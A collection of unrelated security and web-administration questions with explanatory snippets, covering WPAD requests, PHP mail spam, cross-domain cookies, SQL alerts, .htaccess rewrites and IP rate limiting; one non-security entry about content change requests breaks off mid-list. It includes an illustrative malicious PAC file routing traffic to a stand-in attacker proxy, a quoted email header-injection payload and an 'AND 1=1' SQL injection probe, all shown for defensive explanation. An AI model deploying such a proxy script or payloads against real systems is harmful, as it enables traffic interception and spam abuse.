Why is a host requesting a WPAD file from an external location?

In my customer's NGFW logs, I noticed requests being made to [REDACTED]/wpad.dat. The destination domain is registered to an external IP unrelated to the customer, and the user agent suggests that Windows AutoProxy is in use. I was able to download the WPAD file myself and inspect its contents:

function FindProxyForURL(url, host) {
    return "DIRECT";
}

If I understand correctly, since the file returns DIRECT, the traffic is not being routed through any rogue proxy server, so this does not look like an active WPAD attack.

I’m trying to figure out what could have caused this traffic in the first place. Changes to “Internet settings” on the hosts (made by, e.g., malware)? And are there any other risks related to this traffic, aside from the fact that the WPAD file can be changed by the server owner at any time?
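That last risk is worth illustrating: since the hosts fetch and obey this file automatically, the server owner could later swap in a PAC script that routes traffic through a proxy they control. A hypothetical malicious version (evil-proxy.example:8080 is a made-up host) needs only a one-line change:

function FindProxyForURL(url, host) {
    // Route all traffic through an attacker-controlled proxy,
    // falling back to a direct connection if it is unreachable.
    return "PROXY evil-proxy.example:8080; DIRECT";
}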

POST requests are bypassing PHP checks

I have a website with a PHP contact form and a mail server. Emails are sent using PHP's mail() function like so (validation code skipped for brevity):

$name = $_POST["name"];
$email = $_POST["email"];
$message = $_POST['message'];

$headers = array(
    'From' => $name . '<' . $email . '>',
    'MIME-Version' => '1.0',
    'Content-type' => 'text/html; charset=iso-8859-1'
);
$result = mail($to, $subject, $message, $headers, '-r' . $sender);

Recently I’ve been attacked by a spammer who is submitting posts that produce a From field value like this:

check@mydomain.com, this@mydomain.com, link@mydomain.com,  "US:http"@mydomain.com://www.somedomain.com/page <somename@mail.com> 

So I prohibited the @ character in the name field like so:

if (strpos($_POST["name"], "@") !== false)
    exit();

I’ve tried sending a POST request from Postman with a name like name@ and it was successfully rejected, but I am still getting the same spam emails.

Any ideas how the spammer is bypassing the validation check?
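Independent of the answer, note that the payload shown above can also arrive through the email field, which is concatenated into the From header unchecked. A minimal hardening sketch, assuming PHP 7+ and the same field names as the code above, that validates the address and strips header-injection characters from the name:

// Reject anything that is not a single syntactically valid address;
// FILTER_VALIDATE_EMAIL refuses commas, spaces, and line breaks.
$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
    exit();
}

// Strip CR/LF so the name cannot inject extra headers,
// and drop "@" as in the existing check.
$name = str_replace(array("\r", "\n", "@"), '', $_POST['name']);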

Why are cookies sent with an HTML page’s cross-domain requests but not with JS’s XHR?

When we write an HTML page with a form tag, an action attribute, and a submit button, clicking submit sends a request (with cookies) to the URL given as the value of the action attribute.

But if we send a cross-domain request to that same domain with JS’s XHR, cookies won’t be sent.

In both cases the request goes to another domain, yet cookies are sent only in the first case. Why is that?
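For context: XHR omits cookies on cross-origin requests unless the page opts in and the target server explicitly allows credentials. A minimal sketch (https://other.example/api is a placeholder URL):

var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://other.example/api');
// Opt in to sending cookies with this cross-origin request.
xhr.withCredentials = true;
// The browser still only exposes the response if the server replies
// with Access-Control-Allow-Credentials: true and an explicit
// Access-Control-Allow-Origin (a wildcard "*" is not accepted).
xhr.send();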

Security of service requests on a public Wifi

I’m currently rebuilding my network infrastructure and am planning to make my NAS available through an OpenVPN server running on my router for “outside” use (no port forwarding: the NAS stays in the private LAN and is reachable only through the VPN).

Now I was wondering about a certain scenario: let’s say I have mapped some of the NAS’s drives as network drives via SMB/CIFS in Windows on my laptop (using the NAS’s local LAN IP address), or have proprietary software from the NAS’s manufacturer trying to connect to a certain service on a dedicated port.

If I were to take this notebook to an unsecured, public wifi, would the CIFS requests or the proprietary software’s connection attempts expose the local LAN IPs and/or ports before I’m connected to my VPN (i.e. in the window between joining the wifi and the VPN tunnel coming up)? Does this depend on how such a request is implemented in the software?

Is sending SQL query operators in HTTP GET requests some kind of security issue?

Our webserver is forwarding HTTP GET requests to the application server that include a statement or condition like “AND 1=1” (as shown below), and our Palo Alto firewall is flagging this traffic with an SQL injection alert.

The PCAP looks like this:

Hypertext Transfer Protocol
    GET /cadocs/0/j027931e.pdf?resultnum=9&intcmp=searchresultclick AND 1=1 HTTP/1.0\r\n
        [Expert Info (Chat/Sequence): GET /cadocs/0/j027931e.pdf?resultnum=9&intcmp=searchresultclick AND 1=1 HTTP/1.0\r\n]

Can you please explain whether the webserver sending this “AND 1=1” in requests is bad practice, and how it could help attackers? What kind of modifications can be made on the webserver or application server side to resolve this?

Thank You for your efforts…
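One likely contributor, assuming the webserver builds the forwarded URL by string concatenation: the request line above contains raw spaces and an unencoded condition, which is both malformed HTTP and exactly what injection-probe signatures match on. A sketch of the difference in PHP (parameter names taken from the PCAP; whether this applies depends on where the string is actually appended):

// Unencoded: yields "...searchresultclick AND 1=1" in the request
// line, which IDS/IPS signatures flag as SQL injection.
$bad = '/cadocs/0/j027931e.pdf?resultnum=9&intcmp=searchresultclick AND 1=1';

// Encoded via http_build_query(): spaces and "=" inside values are
// escaped, so the forwarded request stays unambiguous.
$params = array(
    'resultnum' => 9,
    'intcmp'    => 'searchresultclick AND 1=1',
);
$good = '/cadocs/0/j027931e.pdf?' . http_build_query($params);
// => /cadocs/0/j027931e.pdf?resultnum=9&intcmp=searchresultclick+AND+1%3D1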

How to configure .htaccess to rewrite all requests into a folder, except a list of exceptions

I have an established website with some legacy folders I would like to keep.

  • https://example.com/.well-known/
  • https://example.com/Music/
  • https://example.com/Rutabagas/

I’ve also installed WordPress. Because there’s an automated update/backup system, I chose to put WordPress into a folder. This way, the WordPress management system won’t see my legacy folders as part of WordPress and wipe them out next time there’s an upgrade.

  • https://example.com/WordPress/

I would like anyone who visits https://example.com/ to see the WordPress site, without the /WordPress/ part in the URL. No problem: Google has several results on how to do this. Except I still want my legacy folders to keep working, and the answers I can find redirect everything.

Is there a way to configure .htaccess to rewrite everything, including /, into the WordPress folder, but leave my three or four legacy folders (and everything inside them) for the server to handle as normal?
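For reference, a sketch of one common mod_rewrite approach (assuming Apache with mod_rewrite enabled; the folder names are taken from the lists above):

RewriteEngine On
RewriteBase /

# Leave the legacy folders, and everything under them, untouched.
RewriteCond %{REQUEST_URI} !^/\.well-known/
RewriteCond %{REQUEST_URI} !^/Music/
RewriteCond %{REQUEST_URI} !^/Rutabagas/

# Do not rewrite requests that already target /WordPress/.
RewriteCond %{REQUEST_URI} !^/WordPress/

# Internally rewrite everything else into the WordPress folder.
RewriteRule ^(.*)$ /WordPress/$1 [L]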

Best practices for managing content change requests?

Hi all!

I'm trying to improve our content change request process. We have 1,000+ pieces of content and a small writing staff, and we're having challenges keeping up with demand. Essentially, we've created a tool that allows users to request changes to an article; a ticket is created and then routed to our writing team.

We receive a change request when:

  • there's a product update
  • a user (either an internal CS agent or a customer) leaves feedback
  • an image becomes outdated
  • a…


How to automatically block IPs that send too many HTTP requests?

I run a website that regularly gets hit by too many HTTP requests coming from the same IP.

Is there a simple way to automatically reject connections from IPs that send more than 2 requests per second?

Currently I just block some IPs manually via iptables, but I want to automatically block IPs that do not behave like a human.
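For reference, a sketch using iptables' hashlimit match (the 2-per-second threshold comes from the question; port 80, the burst value, and plain INPUT-chain placement are assumptions). Note that this counts new TCP connections per source IP rather than individual HTTP requests; for request-level or log-based matching, a tool like fail2ban is the usual next step.

# Drop new HTTP connections from any single source IP that exceeds
# 2 connections/second (after an initial burst of 10).
iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW \
    -m hashlimit --hashlimit-name http --hashlimit-mode srcip \
    --hashlimit-above 2/second --hashlimit-burst 10 -j DROP
iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT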